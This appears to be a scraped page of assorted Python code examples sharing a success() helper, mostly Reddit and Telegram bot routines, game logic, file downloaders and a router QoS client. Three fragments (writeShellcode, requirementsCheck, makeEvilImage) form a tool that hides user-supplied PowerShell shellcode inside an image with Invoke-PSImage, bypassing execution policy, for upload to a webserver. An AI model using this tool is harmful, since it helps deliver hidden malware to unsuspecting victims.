def load_data():
    global banned_users
    global badsubs
    global root_only_subs
    global totalposted
    global imgur_client_id
    global banned_users_comment
    global badsubs_comment
    global root_only_subs_comment
    global totalposted_comment
    imgur_client_id = datafile_lines[2].strip()
    banned_users_comment = "t1_" + datafile_lines[3].strip()
    badsubs_comment = "t1_" + datafile_lines[4].strip()
    root_only_subs_comment = "t1_" + datafile_lines[5].strip()
    totalposted_comment = "t1_" + datafile_lines[6].strip()
    try:
        banned_users = r.get_info(thing_id=banned_users_comment).body.split()
        badsubs = r.get_info(thing_id=badsubs_comment).body.split()
        root_only_subs = r.get_info(
            thing_id=root_only_subs_comment).body.split()
        totalposted = int(float(r.get_info(thing_id=totalposted_comment).body))
        success("DATA LOADED")
    except Exception as e:
        traceback.print_exc()
        fail("DATA LOAD FAILED: %s" % e)
        exit()
def load_data():
  global banned_users
  global badsubs
  global already_done
  global totalposted
  global imgur_client_id
  global USERNAME
  global PASSWORD
  try:
    banned_users = [line.strip() for line in open('banned_users')]
    badsubs = [line.strip() for line in open('badsubs')]
    already_done = [line.strip() for line in open('already_done_dump')]
    with open('totalposted') as f:
      totalposted = pickle.load(f)
    with open ('imgur_client_id', 'r') as myfile:
      imgur_client_id=myfile.read()
    with open ('userpass', 'r') as myfile:
      userpass_lines=myfile.readlines()
      USERNAME = userpass_lines[0].strip()
      PASSWORD = userpass_lines[1].strip()
    success("DATA LOADED")
  except:
    traceback.print_exc()
    file_warning()
    exit()
def load_data():
  global banned_users
  global badsubs
  global root_only_subs
  global totalposted
  global imgur_client_id
  global banned_users_comment
  global badsubs_comment
  global root_only_subs_comment
  global totalposted_comment
  imgur_client_id = datafile_lines[2].strip()
  banned_users_comment = "t1_"+datafile_lines[3].strip()
  badsubs_comment = "t1_"+datafile_lines[4].strip()
  root_only_subs_comment = "t1_"+datafile_lines[5].strip()
  totalposted_comment = "t1_"+datafile_lines[6].strip()
  try:
    banned_users = r.get_info(thing_id=banned_users_comment).body.split()
    badsubs = r.get_info(thing_id=badsubs_comment).body.split()
    root_only_subs = r.get_info(thing_id=root_only_subs_comment).body.split()
    totalposted = int(float(r.get_info(thing_id=totalposted_comment).body))
    success("DATA LOADED")
  except Exception as e:
    traceback.print_exc()
    fail("DATA LOAD FAILED: %s"%e)
    exit()
def load_data():
  global banned_users
  global badsubs #banned subs?
  global root_only_subs
  global summon_only_subs
  global imgur_client_id
  global banned_users_page
  global badsubs_page
  global root_only_subs_page
  global summon_only_subs_page
  imgur_client_id = datafile_lines[2].strip()

  #load wiki pages for lists of users and sub settings
  #TODO change sub name
  banned_users_page = r.get_wiki_page('autowikibot','userblacklist')
  badsubs_page = r.get_wiki_page('autowikibot','excludedsubs')
  root_only_subs_page = r.get_wiki_page('autowikibot','rootonlysubs')
  summon_only_subs_page = r.get_wiki_page('autowikibot','summononlysubs')

  #extract info from sub wiki pages
  try:
    banned_users = banned_users_page.content_md.strip().split()
    badsubs = badsubs_page.content_md.strip().split()
    root_only_subs = root_only_subs_page.content_md.strip().split()
    summon_only_subs = summon_only_subs_page.content_md.strip().split()
    success("DATA LOADED")
  except Exception as e:
    #traceback.print_exc()
    fail("DATA LOAD FAILED: %s"%e)
    exit()
def post_reply(reply,post):
  global badsubs
  global submissioncount
  global totalposted
  try:
    #TODO change name
    #possibly remove? not gonna be nsfw
    reply = "#####	\n\n######	\n\n####	\n"+reply+"^Parent ^commenter ^can [^toggle ^NSFW](/message/compose?to=autowikibot&subject=AutoWikibot NSFW toggle&message=%2Btoggle-nsfw+____id____) ^or[](#or) [^delete](/message/compose?to=autowikibot&subject=AutoWikibot Deletion&message=%2Bdelete+____id____)^. ^Will ^also ^delete ^on ^comment ^score ^of ^-1 ^or ^less. ^| [^(FAQs)](http://www.np.reddit.com/r/autowikibot/wiki/index) ^| [^Mods](http://www.np.reddit.com/r/autowikibot/comments/1x013o/for_moderators_switches_commands_and_css/) ^| [^Magic ^Words](http://www.np.reddit.com/r/autowikibot/comments/1ux484/ask_wikibot/)"
    a = post.reply('[#placeholder-awb]Comment is being processed... It will be automatically replaced by new text within a minute or will be deleted if that fails.')
    postsuccess = r.get_info(thing_id='t1_'+str(a.id)).edit(reply.replace('____id____',str(a.id)))
    if not postsuccess:
      raise Exception ('reply unsuccessful')
    totalposted = totalposted + 1
    submissioncount[str(post.submission.id)]+=1
    success("[OK] #%s "%totalposted)
    return True
  except Exception as e:
    warn("REPLY FAILED: %s @ %s"%(e,post.subreddit))
    if str(e).find('TOO_LONG') > -1:
      a.delete()
    elif str(e) == '403 Client Error: Forbidden' and str(post.subreddit) not in badsubs:
      badsubs = badsubs_page.content_md.strip().split()
      badsubs.append(str(post.subreddit))
      editsummary = 'added '+str(post.subreddit)
      save_changing_variables(editsummary)
    else:
      fail(e)
      a.delete()
    return False
def save_changing_variables(editsummary):
  ##Save badsubs
  global badsubs
  badsubs = list(set(badsubs))
  badsubs.sort(reverse=True)
  c_badsubs = ""
  for item in badsubs:
    c_badsubs = "    "+item+'\n'+c_badsubs
  #TODO change sub name
  r.edit_wiki_page('autowikibot','excludedsubs',c_badsubs,editsummary)
  ##Save root_only_subs
  global root_only_subs
  root_only_subs = list(set(root_only_subs))
  root_only_subs.sort(reverse=True)
  c_root_only_subs = ""
  for item in root_only_subs:
    c_root_only_subs = "    "+item+'\n'+c_root_only_subs
  #TODO change sub name
  r.edit_wiki_page('autowikibot','rootonlysubs',c_root_only_subs,editsummary)
  ##Save summon_only_subs
  global summon_only_subs
  summon_only_subs = list(set(summon_only_subs))
  summon_only_subs.sort(reverse=True)
  c_summon_only_subs = ""
  for item in summon_only_subs:
    c_summon_only_subs = "    "+item+'\n'+c_summon_only_subs
  #TODO change sub name
  r.edit_wiki_page('autowikibot','summononlysubs',c_summon_only_subs,editsummary)
  
  
  success("DATA SAVED")
def load_data():
  global banned_users
  global badsubs
  global root_only_subs
  global summon_only_subs
  global imgur_client_id
  global banned_users_page
  global badsubs_page
  global root_only_subs_page
  global summon_only_subs_page
  imgur_client_id = datafile_lines[2].strip()
  banned_users_page = r.get_wiki_page('autowikiabot','userblacklist')
  badsubs_page = r.get_wiki_page('autowikiabot','excludedsubs')
  root_only_subs_page = r.get_wiki_page('autowikiabot','rootonlysubs')
  summon_only_subs_page = r.get_wiki_page('autowikiabot','summononlysubs')
  try:
    banned_users = banned_users_page.content_md.strip().split()
    badsubs = badsubs_page.content_md.strip().split()
    root_only_subs = root_only_subs_page.content_md.strip().split()
    summon_only_subs = summon_only_subs_page.content_md.strip().split()
    success("DATA LOADED")
  except Exception as e:
    #traceback.print_exc()
    fail("DATA LOAD FAILED: %s"%e)
    exit()
def post_reply(reply,post):
  global badsubs
  global submissioncount
  global totalposted
  # This is a quick hack to fix the double list issue (git issue #12)
  # Please find the actual source of this bug, and delete this hack
  # It removes any sentences that are posted more than once
  lines = []
  for line in reply.split("\n"):
    if line not in lines:
      lines.append(line)
  reply = '\n'.join(lines)
  try:
    reply = "#####	\n\n######	\n\n####	\n"+reply+"\n^Parent ^commenter ^can [^toggle ^NSFW](http://www.np.reddit.com/message/compose?to=autowikiabot&subject=AutoWikibot NSFW toggle&message=%2Btoggle-nsfw+____id____) ^or[](#or) [^delete](http://www.np.reddit.com/message/compose?to=autowikiabot&subject=AutoWikibot Deletion&message=%2Bdelete+____id____)^. ^Will ^also ^delete ^on ^comment ^score ^of ^-1 ^or ^less. ^| [^(FAQs)](http://www.np.reddit.com/r/autowikiabot/wiki/index) ^|  [^Source](https://github.com/Timidger/autowikiabot-py)\n ^(Please note this bot is in testing. Any help would be greatly appreciated, even if it is just a bug report! Please checkout the) [^source ^code](https://github.com/Timidger/autowikiabot-py) ^(to submit bugs)"
    a = post.reply('[#placeholder-awb]Comment is being processed... It will be automatically replaced by new text within a minute or will be deleted if that fails.')
    postsuccess = r.get_info(thing_id='t1_'+str(a.id)).edit(reply.replace('____id____',str(a.id)))
    if not postsuccess:
      raise Exception ('reply unsuccessful')
    totalposted = totalposted + 1
    submissioncount[str(post.submission.id)]+=1
    success("[OK] #%s "%totalposted)
    return True
  except Exception as e:
    warn("REPLY FAILED: %s @ %s"%(e,post.subreddit))
    if str(e) == '(TOO_LONG) `this is too long (max: 15000.0)` on field `text`':
      a.delete()
    elif str(e) == '403 Client Error: Forbidden' and str(post.subreddit) not in badsubs:
      badsubs = badsubs_page.content_md.strip().split()
      badsubs.append(str(post.subreddit))
      editsummary = 'added '+str(post.subreddit)
      save_changing_variables(editsummary)
    else:
      fail(e)
      a.delete()
    return False
Esempio n. 9
0
def writeShellcode(sc):
    info("Reading Template...")
    with open('./res/payload.ps1', 'r') as p:
        payload = p.read().replace('\n', '')
    payload = payload.replace('<encoded>', sc)
    with open('./tmp/payload.ps1', 'w') as f:
        f.write(payload)
    success("Wrote Temp Payload!")
Esempio n. 10
0
def requirementsCheck(img):
    info("Checking Requirements")
    if not os.path.isdir('./tmp'):
        warning("tmp dir does not exist")
        os.makedirs('./tmp')
        success("Created tmp dir")
    sc = input("[?] Paste your Powershell base64 shellcode:")
    writeShellcode(sc)
    makeEvilImage(img)
Esempio n. 11
0
def initialize_new_config():
    CURRENT_DIR = os.getcwd()
    USER_HOME = os.environ.get('HOME', None)

    CONFIG_DIR = None

    if not USER_HOME:
        error('ERROR: User home directory not found')
    elif CURRENT_DIR != USER_HOME:
        # If current directory is not home ask where to initialize
        log('The current directory is not the user\'s home directory')
        log('It is recommended to store the dotfiles directory in the home directory'
            )
        try:
            if prompt_yn(
                    'Would you like to choose switch to the home directory?'):
                CONFIG_DIR = f'{USER_HOME}/{DOTFILES}'
            else:
                CONFIG_DIR = f'{CURRENT_DIR}/{DOTFILES}'
        except Exception:
            error('Invalid choice! exiting...')
            exit(-1)

    print(f'Creating dotfiles repository at {CONFIG_DIR}')
    try:
        os.mkdir(CONFIG_DIR)
    except FileExistsError:
        warning('Given location already exists!')
        try:
            if not prompt_yn(
                    'Initialize at the location anyways? (WARNING: This might cause LOSS OF DATA)',
                    default='N'):
                exit(-1)
        except Exception:
            error('Invalid choice exiting...')
            exit(-1)

    os.chdir(CONFIG_DIR)

    # Initialize a git repository in the configuration directory
    git_process = Popen(['git', 'init'], stdout=PIPE, stderr=PIPE)

    if git_process.wait() != 0:
        error('Error initializing git repository')
        exit(-1)

    # Create an initial configuration file
    config_file = open('configuration.yaml', 'w')

    config_file.write(yaml.dump(default_config))

    config_file.close()

    success('Dotfiles directory initialized successfully')

    return CONFIG_DIR
def post_reply(reply,post):
  global totalposted
  try:
    post.reply(reply)
    totalposted = totalposted + 1
    success("#%s REPLY SUCCESSFUL"%totalposted)
    return True
  except Exception as e:
    warn("REPLY FAILED: %s @ %s"%(e,post.subreddit))
    if str(e) == '403 Client Error: Forbidden':
      badsubs.append(str(post.subreddit))
    return False
def save_changing_variables():
    badsubs.sort()
    c_badsubs = ""
    for item in badsubs:
        c_badsubs = item + "\n" + c_badsubs
    c_badsubs.strip()
    r.get_info(thing_id=badsubs_comment).edit(c_badsubs)
    time.sleep(1)

    r.get_info(thing_id=totalposted_comment).edit(totalposted)
    time.sleep(1)

    success("DATA SAVED")
Esempio n. 14
0
 def removePage(self, pageName):
     if db.fetch('pages', 'page', pageName) == None:
         return success("Page {} wasn't monitored".format(
             pageName))  # it is anyway a success
     db.delete('pages', 'page', pageName)
     self.deadPages.append(pageName)
     if pageName in self.alivePages:
         self.alivePages.remove(pageName)
     else:
         logger.error(
             'There was an error, {} was not in alivePages. It is a bug'.
             format(pageName))
     return success('Page {} removed'.format(pageName))
def login(USERNAME,PASSWORD):
  Trying = True
  while Trying:
	  try:
		  r.login(USERNAME, PASSWORD)
		  success("LOGGED IN")
		  Trying = False
	  except praw.errors.InvalidUserPass:
		  fail("WRONG USERNAME OR PASSWORD")
		  exit()
	  except Exception as e:
	    fail("%s"%e)
	    time.sleep(5)
def save_changing_variables():
  badsubs.sort()
  c_badsubs = ""
  for item in badsubs:
    c_badsubs = item+"\n"+c_badsubs
  c_badsubs.strip()
  r.get_info(thing_id=badsubs_comment).edit(c_badsubs)
  time.sleep(1)
  
  r.get_info(thing_id=totalposted_comment).edit(totalposted)
  time.sleep(1)

  success("DATA SAVED")
Esempio n. 17
0
def download_subdirectory(subdir_name, options):
    """
    Downloads and extracts only a certain subdirectory
    Works by downloading the whole repo and taking just the folder
    that we need.
    """

    util.print_msg("info", "Preparing to download the subdirectory %s" % subdir_name)
    TMPDIR_NAME = "grabrc.subdir.tmpd"
    TMPDIR_PATH = os.path.join(options.destdir, TMPDIR_NAME)
    TARGET_PATH = os.path.join(options.destdir, options.outfile or subdir_name)
    logging.debug("Subdirectory tmpdir: %s" % TMPDIR_PATH)
    logging.debug("Subdirectory target: %s" % TARGET_PATH)

    util.info("Creating temporary directory paths...")

    if options.append:
        util.warn("Append option doesn't apply to directories. \
        Falling to default behavior of backing up \
        the existing directory")

    target_exists = os.path.exists(TARGET_PATH)
    if target_exists:
        if options.replace:
            util.info("Replacing the existing directory %s" % TARGET_PATH)
            shutil.rmtree(TARGET_PATH)
        else:
            util.warn("Found an existing directory %s" % TARGET_PATH)
            util.warn("Backing up existing directory %s to %s%s" %
                      (TARGET_PATH, TARGET_PATH, Const.BACKUP_SUFFIX))
            util.backup_file(TARGET_PATH)

    # Try to download the repository then move it to the current directory
    # _create_grabrc_folder will check if the directory already exists
    try:
        # Download the repository and move the subdirectory
        _create_grabrc_folder(options.github,
                              options.destdir,
                              TMPDIR_NAME)
        #os.makedirs(TMPDIR_PATH)  # Create the tmpdir again
        # We still use subdir_name, the original name
        if not os.path.exists(os.path.join(TMPDIR_PATH, subdir_name)):
            util.exit_runtime_error("Couldn't find the subdirectory %s in the repository" % subdir_name)

        shutil.move(os.path.join(TMPDIR_PATH, subdir_name), TARGET_PATH)
    finally:
        # Clean up after ourselves
        util.info("Cleaning up temporary directories...")
        shutil.rmtree(TMPDIR_PATH)

    util.success("Downloaded subdirectory %s to %s" % (subdir_name, TARGET_PATH))
Esempio n. 18
0
def SearchSubredditTitlesForKeywords(subredditName, keyWords):

	already_done = []

	#Starting with a single subreddit.  This may later be changed to look at all comments 
	subreddit = r.get_subreddit(subredditName)
	for submission in subreddit.get_hot(limit=10):
		op_text = submission.selftext.encode('ascii', 'ignore').lower()		
		has_keyWords = any(string in op_text for string in keyWords)
		# Test if it contains a PRAW-related question
		if submission.id not in already_done and has_keyWords:
			msg = '[Keyword found](%s)' % submission.short_link
			success(msg)
			already_done.append(submission.id)
def save_changing_variables():
  banned_users.sort()
  with open('banned_users', 'w+') as myfile:
    for item in banned_users:
      myfile.write("%s\n" % item)
  badsubs.sort()
  with open('badsubs', 'w+') as myfile:
    for item in badsubs:
      myfile.write("%s\n" % item)
  with open('already_done_dump', 'w+') as myfile:
    for item in already_done:
      myfile.write("%s\n" % item)
  with open('totalposted', 'w') as f:#TODO replace pickle with simple write
    pickle.dump(totalposted, f)
  success("DATA SAVED")
Esempio n. 20
0
def download_images(
        component_descriptor: ComponentDescriptor,
        upload_registry_prefix: str,
        image_reference_filter,
        parallel_jobs=8,  # eight is a good number
):
    '''
    downloads all matching container images, discarding the retrieved contents afterwards.
    While this may seem pointless, this actually does server a purpose. Namely, we use the
    vulnerability scanning service offered by GCR. However, said scanning service will only
    continue to run (and thus update vulnerability reports) for images that keep being
    retrieved occasionally (relevant timeout being roughly 4w).
    '''
    image_refs = [
        ci.image_reference()
        for _, ci in product.util._enumerate_effective_images(
            component_descriptor=component_descriptor,
            image_reference_filter=image_reference_filter,
        )
    ]

    # XXX deduplicate this again (copied from product/scanning.py)
    def upload_image_ref(image_reference):
        image_name, tag = image_reference.rsplit(':', 1)
        mangled_reference = ':'.join((image_name.replace('.', '_'), tag))
        return urljoin(upload_registry_prefix, mangled_reference)

    image_refs = [upload_image_ref(ref) for ref in image_refs]

    info(
        f'downloading {len(image_refs)} container images to simulate consumption'
    )

    executor = ThreadPoolExecutor(max_workers=parallel_jobs)

    def retrieve_image(image_reference: str):
        try:
            container.registry.retrieve_container_image(
                image_reference=image_reference)
            info(f'downloaded {image_reference}')
        except Exception:
            warning(f'failed to retrieve {image_reference}')
            import traceback
            traceback.print_exc()

    # force generator to be exhausted
    tuple(executor.map(retrieve_image, image_refs))
    success(f'successfully retrieved {len(image_refs)} container images')
    def finish(self):
        # set last update
        self.channel.last_update = datetime.date.today()
        self._save_channel()

        new_bots = Bot.select_new_bots()
        if not self.silent and len(new_bots) > 0:
            self.notify_admin("Sending notifications to subscribers...")
            subscribers = Notifications.select().where(Notifications.enabled == True)
            notification_count = 0
            for sub in subscribers:
                try:
                    util.send_md_message(self.bot, sub.chat_id,
                                         messages.BOTLIST_UPDATE_NOTIFICATION.format(
                                             n_bots=len(new_bots),
                                             new_bots=Bot.get_new_bots_markdown()))
                    notification_count += 1
                    sub.last_notification = datetime.date.today()
                    sub.save()
                except TelegramError:
                    pass
            self.sent['notifications'] = "Notifications sent to {} users.".format(
                notification_count)

        changes_made = len(self.sent) > 1 or len(self.sent['category']) > 0
        if changes_made:
            text = util.success('{}{}'.format('BotList updated successfully:\n\n',
                                              mdformat.results_list(self.sent)))
        else:
            text = mdformat.none_action("No changes were necessary.")

        log.info(self.sent)
        self.bot.formatter.send_or_edit(self.chat_id, text, to_edit=self.message_id)
Esempio n. 22
0
def notify_bot_spam(bot, update, args=None):
    tg_user = update.message.from_user
    user = User.from_telegram_object(tg_user)
    if util.stop_banned(update, user):
        return
    reply_to = util.original_reply_id(update)

    if args:
        text = ' '.join(args)
    else:
        text = update.message.text
        command_no_args = len(
            re.findall(r'^/spam\s*$',
                       text)) > 0 or text.lower().strip() == '/spam@botlistbot'
        if command_no_args:
            update.message.reply_text(util.action_hint(
                "Please use this command with an argument. For example:\n/spam @mybot"
            ),
                                      reply_to_message_id=reply_to)
            return

    # `#spam` is already checked by handler
    try:
        username = re.match(settings.REGEX_BOT_IN_TEXT, text).groups()[0]
        if username == '@' + settings.SELF_BOT_NAME:
            log.info("Ignoring {}".format(text))
            return
    except AttributeError:
        if args:
            update.message.reply_text(util.failure(
                "Sorry, but you didn't send me a bot `@username`."),
                                      quote=True,
                                      parse_mode=ParseMode.MARKDOWN,
                                      reply_to_message_id=reply_to)
        else:
            log.info("Ignoring {}".format(text))
            # no bot username, ignore update
            pass
        return

    try:
        spam_bot = Bot.get(
            fn.lower(Bot.username)**username.lower(), Bot.approved == True)
        try:
            Suggestion.get(action="spam", subject=spam_bot)
        except Suggestion.DoesNotExist:
            suggestion = Suggestion(user=user,
                                    action="spam",
                                    date=datetime.date.today(),
                                    subject=spam_bot)
            suggestion.save()
        update.message.reply_text(util.success(
            "Thank you! We will review your suggestion and mark the bot as spammy."
        ),
                                  reply_to_message_id=reply_to)
    except Bot.DoesNotExist:
        update.message.reply_text(
            util.action_hint("The bot you sent me is not in the @BotList."),
            reply_to_message_id=reply_to)
    return ConversationHandler.END
Esempio n. 23
0
def req_list() -> dict:
    """
    查询玩家申请列表
    """
    page: int = int(request.args["page"])
    page_size: int = int(
        request.args["pageSize"] if request.args["pageSize"] else "10")

    count: int = db.session.query(func.count(ApplyPlayer.id)).scalar()
    page: int = max(1, min(page, math.ceil(count / page_size)))

    keyword = request.args["keyword"]
    status = request.args["status"]
    query = db.session.query(ApplyPlayer)
    if keyword:
        keyword = '%' + keyword + '%'  # 此处无 SQL 注入风险
        query = query.filter(
            or_(ApplyPlayer.player_name.like(keyword),
                ApplyPlayer.ip.like(keyword), ApplyPlayer.qq.like(keyword)))
    if status:
        query = query.filter_by(status=ApplyStatus.__members__[status])
    apply_players: list = query\
        .order_by(ApplyPlayer.req_time.desc()) \
        .limit(page_size) \
        .offset((page - 1) * page_size) \
        .all()

    for player in apply_players:
        player.password = None

    return success(pager_data(page, count, apply_players, page_size))
Esempio n. 24
0
def manage_subscription(bot, update):
    chat_id = update.effective_chat.id
    user_id = update.effective_user.id

    if util.is_group_message(update):
        admins = bot.get_chat_administrators(chat_id)
        if user_id not in admins:
            bot.formatter.send_failure(
                chat_id,
                "Sorry, but only Administrators of this group are allowed "
                "to manage subscriptions.")
            return

    text = "Would you like to be notified when new bots arrive at the @BotList?"
    buttons = [[
        InlineKeyboardButton(util.success("Yes"),
                             callback_data=util.callback_for_action(
                                 CallbackActions.SET_NOTIFICATIONS,
                                 {'value': True})),
        InlineKeyboardButton("No",
                             callback_data=util.callback_for_action(
                                 CallbackActions.SET_NOTIFICATIONS,
                                 {'value': False}))
    ]]
    reply_markup = InlineKeyboardMarkup(buttons)
    msg = util.send_md_message(bot, chat_id, text, reply_markup=reply_markup)
    return ConversationHandler.END
Esempio n. 25
0
 def get_qos_detail(self):
     req = requests.get(self.endpoint_url + "/api/misystem/qos_info")
     if (req.status_code == 200):
         return success(message="QoS info retrieved!", data=req.json())
     return fail(
         message="There was an error while getting the QoS details...",
         data=req.content)
Esempio n. 26
0
def get_by(key, value):
    device = db.devices.find_one({key: value}, {'details': {"$slice": -10}})
    if (device):
        del device["_id"]
        return util.success("Entity found", device)
    else:
        return util.fail("Entity not found")
Esempio n. 27
0
    def _systeminfo_eventit(self, agent, data, systeminfo_url):
        """Send if event failed/okay event as appropriate."""

        notification = self.server.notifications.get("systeminfo")

        if success(data):
            if notification.color == 'red':
                adata = agent.todict()
                if 'info' in data:
                    adata['info'] = data['info']
                if self.system[SystemKeys.STATUS_SYSTEMINFO_SEND_ALERTS]:
                    self.event.gen(EventControl.SYSTEMINFO_OKAY, adata)
                notification.modification_time = func.now()
                notification.color = 'green'
                notification.description = systeminfo_url
                meta.Session.commit()
        else:
            # Failed
            if notification.color != 'red' or \
                                notification.description != systeminfo_url:
                # If the systeminfo_url has changed, then tell them this
                # one didn't work (either).  We can potentially send
                # multiple of these events if they keep entering bad
                # URLs.
                adata = agent.todict()
                adata['error'] = data['error']
                if self.system[SystemKeys.STATUS_SYSTEMINFO_SEND_ALERTS]:
                    self.event.gen(EventControl.SYSTEMINFO_FAILED, adata)
                notification.modification_time = func.now()
                notification.color = 'red'
                notification.description = systeminfo_url
                meta.Session.commit()
Esempio n. 28
0
 def leave_game(self, player: Player) -> Dict[str, str]:
     '''Removes player from game and progresses game if it's that players turn'''
     current_player = self.players[self.current_player_index]
     current_stage = self.stage_index
     if len(self.players) == 1:
         self.status = "Completed"
         return util.success("Successfully ended game")
     if player == current_player:
         next_player = self.players[(self.current_player_index + 1) % len(self.players)]
         self.players = [_player for _player in self.players if _player != player]
         self.current_player_index = self.players.index(next_player)
         self.stage_index = 0
     else:
         self.players = [_player for _player in self.players if _player != player]
         self.current_player_index = self.players.index(current_player)
     return util.success("Successfully left game")
Esempio n. 29
0
 def deck_to_hand(self, player: Player) -> Dict[str, str]:
     '''Draws three cards from market to players hand'''
     if self.market:
         return util.error("Cannot draw cards until market is empty")
     player.hand = player.hand + self.draw_cards(3)
     self.go_next_stage()
     self.go_next_player()
     return util.success('Successfully drew two cards for hand')
def post_reply(reply, post):
    global totalposted
    try:
        reply = "#####&#009;\n\n######&#009;\n\n####&#009;\n" + reply
        post.reply(reply)
        totalposted = totalposted + 1
        success("#%s REPLY SUCCESSFUL" % totalposted)
        return True
    except praw.errors.RateLimitExceeded as error:
        warn('RL %d SEC' % error.sleep_time)
        time.sleep(error.sleep_time)
    except Exception as e:
        warn("REPLY FAILED: %s @ %s" % (e, post.subreddit))
        if str(e) == '403 Client Error: Forbidden':
            badsubs = r.get_info(thing_id=badsubs_comment).body.split()
            badsubs.append(str(post.subreddit))
            save_changing_variables()
        return False
def post_reply(reply,post):
  global totalposted
  try:
    reply = "#####&#009;\n\n######&#009;\n\n####&#009;\n"+reply
    post.reply(reply)
    totalposted = totalposted + 1
    success("#%s REPLY SUCCESSFUL"%totalposted)
    return True
  except praw.errors.RateLimitExceeded as error:
  	warn('RL %d SEC' % error.sleep_time)
  	time.sleep(error.sleep_time)
  except Exception as e:
    warn("REPLY FAILED: %s @ %s"%(e,post.subreddit))
    if str(e) == '403 Client Error: Forbidden':
      badsubs = r.get_info(thing_id=badsubs_comment).body.split()
      badsubs.append(str(post.subreddit))
      save_changing_variables()
    return False
Esempio n. 32
0
 def start_game(self, player: Player) -> Dict[str, str]:
     '''Starts game by dealing cards to players and setting status'''
     if self.status != 'Awaiting':
         return util.error('Game has already started')
     if not player.is_host:
         return util.error('Only host can start game')
     self.deal_cards()
     self.status = 'Running'
     return util.success('Successfully started game')
Esempio n. 33
0
def LoginToReddit():
	datafile_lines = OpenConfigFile()
	r = praw.Reddit("LearnRedditAPI - Alpha .1")
	USERNAME = datafile_lines[0].strip()
	PASSWORD = datafile_lines[1].strip()
	Trying = True
	while Trying:
		try:
			r.login(USERNAME, PASSWORD)
			success("LOGGED IN")
			Trying = False
			return r
		except praw.errors.InvalidUserPass:
			fail("WRONG USERNAME OR PASSWORD")
			exit()
		except Exception as e:
		  fail("%s"%e)
		  time.sleep(5)
Esempio n. 34
0
 def buy_field(self, player: Player):
     '''Buy third field for 3 coins'''
     if player.coins < 3:
         return util.error("Not enough coins to purchase third field")
     if player.fields[2].enabled:
         return util.error("Field already purchased")
     player.coins -= 3
     player.fields[2].enabled = True
     return util.success("Successfully purchased third field")
Esempio n. 35
0
 def reject_trade(self, player: Player, trade_id: str):
     trade: Trade = util.shrink([trade for trade in self.trades if trade.id == trade_id])
     if not trade:
         return util.error("Trade does not exist")
     if player is not trade.p2:
         return util.error("You are not in this trade")
     # Remove trade from trades
     self.trades = [trade for trade in self.trades if trade.id != trade_id]
     return util.success("Trade successfully rejected")
Esempio n. 36
0
 def create_trade(self, p1: Player, p2_name: str, card_ids: List[str], wants: List[str]):
     tcs: List[TradingCard] = self.ids_to_tcs(p1, card_ids)
     new_trades: List[Trade] = []
     p2: Player = util.shrink([player for player in self.players if player.name == p2_name])
     if not p2:
         return util.error("Player chosen is not in game")
     new_trades += [Trade(p1, p2, tcs, wants)]
     self.trades += new_trades
     return util.success('Successfully created trade')
Esempio n. 37
0
def _create_grabrc_folder(username, destdir, dirname):
    """
    Creates the local copy of the grabrc git repository in directory destdir
    with name dirname. The path destdir/dirname should not already exist
    """
    # Check if the repo exists
    repo_dirpath = os.path.join(destdir, dirname)
    tmp_path = os.path.join(repo_dirpath, "grabrctmp.d")

    def download_and_untar():
        """Downloads a tar from the server, untars one directory up"""
        repo_targz = _get_grabrc_archive(username, "targz")
        util.untar_gz(repo_targz)
        os.renames(glob.glob("./%s*" % (Const.REPO_NAME))[0], tmp_path)

    # Sanity check: if they have a file named with the directory (they shouldn't))
    if os.path.isfile(repo_dirpath):
        util.warn("Found a file where there should be a git directory. \
                   Backing up...")
        util.backup_file(repo_dirpath)
    elif os.path.isdir(repo_dirpath):
        util.info("Found an existing directory named %s in %s..." % (dirname, destdir))
        util.info("Backing up the directory...")
        util.backup_file(repo_dirpath)

    if not os.path.exists(repo_dirpath):
        # Make a temporary staging directory
        util.print_msg("info", "Preparing repository directory at %s" % repo_dirpath)
        os.makedirs(repo_dirpath)
        os.chdir(repo_dirpath)

        download_and_untar()

        # Move everything from the tmpdirectory to one level up
        repofiles = [os.path.join(tmp_path, filename)
                     for filename in os.listdir(tmp_path)]
        map(lambda f: shutil.move(f, repo_dirpath), repofiles)  # os.rmdir requires empty dir
        os.rmdir(tmp_path)
    else:
        util.exit_runtime_error("The repository's target directory exists at %s \
        but should have been backed up to a different location. Race condition?" % repo_dirpath)

    util.success("Finished repository download.")
Esempio n. 38
0
 def set_qos_status(self, status=0):
     if (status != 0 and status != 1):
         return fail('Invalid status, send 0 for disable, 1 for enable')
     req = requests.get(self.endpoint_url +
                        '/api/misystem/qos_switch?on={}'.format(status))
     if (req.status_code == 200):
         return success('QoS status changed to {}'.format(status))
     return fail(
         'There was an error while setting the status of QoS to {}'.format(
             status))
Esempio n. 39
0
def download_file(filename, options):
    """Downloads a file from the grabrc server"""
    FILE_URL = "%s/%s/%s" % \
        (Const.SERVER_URL, options.github, filename)

    logging.debug("FILE_URL: %s" % FILE_URL)

    contents = util.http_get_contents(FILE_URL)

    if options.stdout:
        print contents
        sys.exit(0)

    # Use options if they exist, otherwise fall to defaults
    outfile = options.outfile or filename
    destdir = options.destdir or os.getcwd()
    target_path = os.path.join(destdir, outfile)
    backup_path = target_path + Const.BACKUP_SUFFIX
    target_file_exists = os.path.isfile(target_path)

    # Handle --append, --replace, or default behavior (default is to backup a conflict)
    if not target_file_exists or options.append:
        handle = open(target_path, "a+")
        if options.append:
            handle.write("\n\n")  # Make appending prettier
    elif options.replace:
        handle = open(target_path, "w+")
    elif target_file_exists:
        # Backup the existing file and then write the new file
        util.warn("A file already exists at %s! Moving it to a backup at: %s"
                  % (target_path, backup_path))
        util.backup_file(target_path)
        handle = open(target_path, "w+")
    else:
        util.exit_runtime_error("Please file a bug.",
                                "(File download doesn't seem to cover all option cases)")

    logging.debug("(Outfile, Destination, Target)\n -- (%s, %s, %s)"
                  % (outfile, destdir, target_path))

    handle.write(contents)
    util.success("Downloaded %s to %s." % (filename, target_path))
Esempio n. 40
0
def makeEvilImage(img):
    info("Generating Image...")
    command = 'powershell -noprofile -executionpolicy bypass "Import-Module .\\res\\Invoke-PSImage.ps1; Invoke-PSImage -Script {0} -Image {1} -Out .\\dist\\{2}"'
    if not os.path.isdir('./dist'):
        os.makedirs('./dist')
    payload = ".\\tmp\\payload.ps1"
    outimg = img.split('.')
    outimg = outimg[0] + ".png"
    proc = subprocess.Popen(command.format(payload, img, outimg),
                            stdout=subprocess.PIPE,
                            stderr=subprocess.PIPE,
                            shell=True)
    data = proc.communicate()[0]
    data = data.decode('utf-8').replace('\n', '')
    success("Done - Image is .\\dist\\{0}".format(outimg))
    info(
        "Upload .\\dist\\{0} to a Webserver - NO IMGHOSTS SINCE THEY COMPRESS THE IMG"
        .format(outimg))
